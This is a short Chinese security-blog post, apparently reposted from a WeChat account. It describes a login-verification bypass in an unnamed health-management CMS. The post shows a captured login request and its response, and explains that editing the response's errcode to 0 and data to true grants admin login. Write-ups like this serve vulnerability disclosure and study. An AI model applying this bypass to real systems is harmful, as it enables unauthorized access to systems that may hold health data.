某某健康管理CMS存在登录验证绕过

  • A+
所属分类:安全文章

前言

    某某健康管理CMS存在登录验证绕过


一.漏洞复现


后台登录为这个样子的

某某健康管理CMS存在登录验证绕过

这里我们随便输入用户密码和手机,然后用burp suite抓包

POST /FrameWeb/FrameService/Main.ashx?option=func&funcid=login HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 200Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/FrameWeb/FrameView/Login/Login.htmlCookie: JSESSIONID=B8707667A91CA3E1564158F4112158B5; account=admin; mobile=13800000000; chkpwd=false; employeeName=admin; jobName=%E8%B6%85%E7%BA%A7%E7%AE%A1%E7%90%86%E5%91%98; generalType=2
{"_dataid":"login","_type":"","_datatype":"text","_param":{"Account":"123abc","Phone":"13800000000","Pwd":"123456"},"_timestamp":1627660684,"funcid":"login","_sign":"e05b00c8e171f6890ae37539037bea61"}

然后选择拦截返回包


HTTP/1.1 200 Server: nginxDate: Fri, 30 Jul 2021 16:00:33 GMTContent-Type: application/json;charset=UTF-8Content-Length: 47Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: http://39.107.192.171Vary: OriginAccess-Control-Expose-Headers: Set-Cookie
{"errcode":"1","errmsg":"无此用户",data:{}}

这里我们把errcode参数值改为0,data参数添加true放包即可成功登录

某某健康管理CMS存在登录验证绕过


本文始发于微信公众号(F12sec):某某健康管理CMS存在登录验证绕过

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: